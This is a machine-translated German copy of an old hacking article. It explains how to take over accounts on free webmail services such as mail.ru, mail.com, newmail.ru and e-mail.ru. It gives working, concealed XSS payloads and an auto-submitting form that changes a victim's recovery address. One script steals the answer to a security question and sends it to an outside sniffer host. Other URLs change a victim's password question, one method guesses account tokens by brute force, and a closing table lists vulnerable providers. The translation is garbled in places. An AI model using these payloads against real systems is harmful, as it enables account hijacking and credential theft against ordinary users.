This page has been robot translated, sorry for typos if any. Original content here.

ÜBERPRÜFUNG DER VULNERIERBARKEIT FREIER POSTDIENSTE

Wir beschäftigen uns weiterhin mit Web-Mail. Ich habe eine kleine Studie über verschiedene Dienste für Hacking durchgeführt und zeige Ihnen die Ergebnisse. Die Technologie des Angriffs bleibt dieselbe: Es wird eine E-Mail mit einem JavaScript-Code gesendet, der an die Adresse einer anderen Person gesendet wird. Dies funktioniert, wenn die Nachricht geöffnet wird, und ändert einige Informationen in den Einstellungen der Benutzerbox. Es hat keinen Sinn, jeden Server im Detail zu beschreiben, da der Ansatz überall gleich ist, deshalb werde ich einige Beispiele geben und am Ende eine Tabelle. In den meisten Fällen kann Hacking mit einigen Annahmen als 100% betrachtet werden: Der Benutzer muss das Web-Interface zum Lesen von Briefen verwenden, beim Schreiben von Exploits wurde ich von einer Standard-Plattform geführt, dh ich gehe zunächst davon aus, dass der Benutzer kein exotisches Betriebssystem hat Browser mit JS-Ausführung deaktiviert.

WWW.MAIL.RU

Ich fange mit der Nummer 1 in Russland an. Im Moment, durch das Überspringen von JavaScript und einen Entwicklerfehler, kann diese Box durchbrochen werden. Ich glaube, dass die Grundprinzipien gut bekannt sind. Wie erhalte ich ein Passwort? 1 - um es unbefugt zu ändern. Pass nicht auf, du musst das vorher Gewordene kennen. 2 - um die geheime Frage zu ändern und den Dienst zu nutzen, um Amnesie zu bekämpfen. Wird auch nicht funktionieren. 3 - Richten Sie Ihre alternative E-Mail ein, um das neue Passwort zu erhalten, das vom System generiert wurde. Es klappt nicht, die letzten beiden oben genannten Optionen sind in der gleichen Form und sind auch passwortgeschützt. Auch die übrigen, für uns weniger interessanten Einstellungen (Name, Nachname usw.) können nun ohne Eingabe des aktuellen Passwortes nicht geändert werden. Es scheint, dass es keine Optionen gibt. Allerdings gibt es so einen sekundären, unscheinbaren Abschnitt der Einstellungen "Kontaktinformationen" (ICQ, Website, Telefon, Arbeitsplatz, Zeitzone, etc.). In diesem Abschnitt können Sie auch eine Kontakt-E-Mail angeben. Der Trick dabei ist, dass sich gleichzeitig in den Registrierungsinformationen die alternative Adresse ändert, die aber im Fragebogen registriert ist, und nun können Sie mit dem Erinnerungsdienst ein Passwort für Soap erhalten. Es ist einfach. URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru Wahrheit der GET-Methode ist, dass die Einstellungen in der mail.ru-Box jetzt nicht geändert werden können, also werde ich die technische Seite der Frage im Detail beschreiben.

I. Wir senden an die gewünschte Box einen Brief mit einem Code, der direkt im Nachrichtentext einen Link mit einem Link zu unserer Site generiert. Wenn möglich, sollte das Skript ohne Benutzereingaben funktionieren (Klicken, Klicken, Mouseover, Bild-Upload usw.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //IhreSite.IhreDomain.com/IhreSkript.html> </ iFrame>'; this.wav">
 <p id = 'xxx'>
Um die Funktionalität des Skripts vollständig zu gewährleisten und zu verschleiern, konvertieren wir:
 <embed src = "javascript: status = Speicherort; document.getElementById ('xxx'). innerHTML = 'iframe src = http: //yoursite.com/ihrescript.html width = 0 height = 0> </ iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
In diesem Formular ersetzen die Zeichencodes die Buchstaben im Namen der JavaScript- und Iframe-Elemente, und das Mail-Skript filtert sie nicht. Der Status = Standortzeile; Erstellt die Sichtbarkeit der lokalen URL in der Statusleiste, sodass kein äußeres Flackern einen Verdacht erweckt. Die Attribute width und height des Frames und der Einbettung werden auf Null gesetzt und unsichtbar gemacht.

II. Auf der Ressource http://yoursite.ru haben wir ein HTML-Dokument mit einem Formular zum Senden der geänderten Daten an den Server mail.ru.

Der Inhalt von yourscript.html:
 <form method = "post" action = "http://www.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <input type = "hidden" name = "Seite" value = "2"> <br>
 <input type = "hidden" name = "E-Mail" value = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Speichern" name = "Speichern"> <br>
 </ form> <br>
 <Skript> <br>
 document.anketa.submit (); <br>
 </ script>
Hinweise: Die Arbeit des Client-Teils des Skripts in unveränderter Form ist nur für den IE gewährleistet; Die Form des Versands wird auf einer separaten Website veröffentlicht, um den Brief "auszuladen".


WWW.MAIL.COM

Jetzt ein etwas anderer Sicherheitsfehler, zum Beispiel http://mail.com. Wenn Sie den Passwort-Erinnerungsdienst verwenden, müssen Sie nur die korrekte Antwort auf die geheime Frage eingeben (eine der Optionen). Also haben wir uns die Aufgabe gestellt, diese Antwort zu bekommen. Das ist leicht gemacht. Als ich in die Eigenschaften des Postfachs ging und die Registrierungsinformationen durchging, sah ich, dass die Antwort auf die geheime Frage nicht verborgen ist, was uns erlaubt, JavaScript zu verwenden, um seinen Wert zu nutzen.

Wir implementieren das Skript über das Style- Tag.
Adresse der Seite mit den Einstellungen: http://mail01.mail.com/scripts/common/genprofile.cgi
Formularname: Profilform
Der Name des Textfelds mit einer geheimen Antwort: Hinweis_a
Am Ende, um eine geheime Frage zu stehlen, müssen Sie die Einstellungsseite aufrufen, JavaScript ausführen, den Wert von document.profileform.hint_a.value abrufen und zusammen mit der Umgebungsvariablen REQUEST_UR I an den Sniffer übergeben .

Fertige Version:
 <style> @import-URL (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'null'% 6FnLoad = `str = document.zero.profileform.hint_a.value; Pfad = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = Pfad + str`> </ iframe>" ); </ style>
 <span id = 'out'> </ span>
Im generierten Frame mit dem Namen Null wird die Einstellungsseite geladen. Am Ende des Downloads startet der OnLoad-Handler das Skript zum Lesen der geheimen Frage und sendet dann über denselben Frame eine Antwort an den Sniffer. Jetzt reicht es, zu http://zero.h12.ru/stat/log.php zu gehen und die notwendigen Informationen in der Zeile "Host" zu finden .

WWW.NEWMAIL.RU

Meiner Meinung nach ein ziemlich beliebter Postbote, also erzähle ich Ihnen ausführlich. Darüber hinaus ist es viel einfacher, den Bericht eines anderen in Besitz zu nehmen, als es auf den ersten Blick scheint. Sie können dies tun: Senden Sie eine Nachricht mit einem Skript, das beim Start die Sitzungs-ID erhält, generieren Sie die erforderlichen Abfragen und ändern Sie die Einstellungen der altrenativen E-Mail (an die das Passwort anschließend gesendet wird) und die geheime Frage und Antwort. Wenn Sie jedoch eine andere Adresse mit einer Erinnerung angeben, wird das Kennwort an sie gesendet, sofern die geheime Antwort korrekt ist. Und die folgende Beobachtung: Sitzungs-ID zum Ändern der Einstellungen kann überhaupt nicht verwendet werden. Außerdem sind alle Tags erlaubt. All dies reduziert die Menge an Code auf ein paar Zeilen:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = FRAGE & cp_answ = ANTWORT width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

Die Methode, E-mail.ru etwas zu hacken, passt nicht in das allgemeine Thema des Artikels, sondern immer noch - Mail :) . Als ich von einer Box ein Passwort bekommen musste, registrierte ich wie üblich meinen Account und begann, das System zu untersuchen. Das erste, was mir ins Auge fiel, war die Fähigkeit, ein neues Passwort und eine geheime Frage mit einer Antwort zu setzen, ohne das alte Passwort einzugeben. Der übliche Aktionsplan besteht darin, das Filtern von Tags zu überprüfen, die ID abzurufen und die Abfrage auszuführen. Um jedoch die Einstellungen zu ändern, verwendet eine spezielle Variable utoken, die im Hauptteil des Dokuments enthalten ist. Nach dem Experimentieren mit der Änderung der Frage und der Antwort mit dem vorher bekannten utoken:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Ich bin gekommen die Schlussfolgerung, dass ID und Cookies zum Ändern der Einstellungen nicht erforderlich sind. In diesem Fall wurde nach der Überwachung von utoken festgestellt, dass die vierstellige Hexadezimalzahl nach der E-Mail-Adresse email@e-mail.ru-5a00 in einem sehr engen Bereich liegt. Nämlich, um eine geheime Frage mit der Antwort auf jede Box von Interesse für uns zu etablieren, müssen Sie nur 7 Optionen durchlaufen : 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . Wenn die Zahl erraten wird, gelangen wir in die gewünschte Box.

Anmerkungen: Im Moment gab es einige Änderungen. Der Dienst zur Passwortwiederherstellung funktioniert nicht, daher ist es ratsam, ihn sofort zu ändern. Die Adresse der Konfigurationsänderung hat sich ebenfalls geändert:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Die Methode funktioniert nicht für immer. Wahrscheinlich ist es trotzdem erforderlich, dass der Benutzer von Zeit zu Zeit in die Post über das Web einsteigt.

Tabelle mit Eigenschaften von freien WWW-Servern

Server JavaScript Vulnerabilität
www.km.ru
km.ru
img src = javascript: Ermöglicht das Lesen des Passworts von der Einstellungsseite aus dem Passwortfeld
www.mail.ru
inbox.de , bk.ru , liste.ru ,
einbetten src = javascript: Sie können eine alternative E-Mail ändern
www.mail.com
email.com , post.com , myself.com , berater.com und andere.
@ Import-URL (Javascript :); Die Einstellungen zeigen die Antwort auf die Sicherheitsfrage
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
In keiner Weise Lesen / ändern Sie die Frage und beantworten Sie. Das Passwort ist gültig
www.netman.ru und www.mailgate.ru
derselbe Postbote. etwa 80 Domains
img src = javascript :, style = hintergrund: url (javascript :) Sie können eine Antwort auf eine geheime Frage stehlen, wenn sie installiert ist. Es ist auch möglich, die Adresse für die Weiterleitung festzulegen (Kopien werden nicht gespeichert)
www.yandex.ru OnError, OnLoad Entfernen der Site * .narod.ru (JS ist nicht erforderlich)
www.ukr.net Einbetten von src = javasc
ript: dies .wav>
Lesen Sie die Antwort zu Ihrer Sicherheitsfrage
www.nextmail.ru
xer.ru , email.su , russian.ru , studenten.ru , programmist.ru , designer.ru , mail2k.ru ,
einbetten src = "javascript: Ändern / stehlen Sie die Antwort auf Ihre Sicherheitsfrage
www.hotbox.de
pochta.ru , pisem.net , fromru.com , land.ru und andere.
In vielerlei Hinsicht Löschen eines Kontos
www.rin.ru einbetten src = javascript: Lies geheime Antwort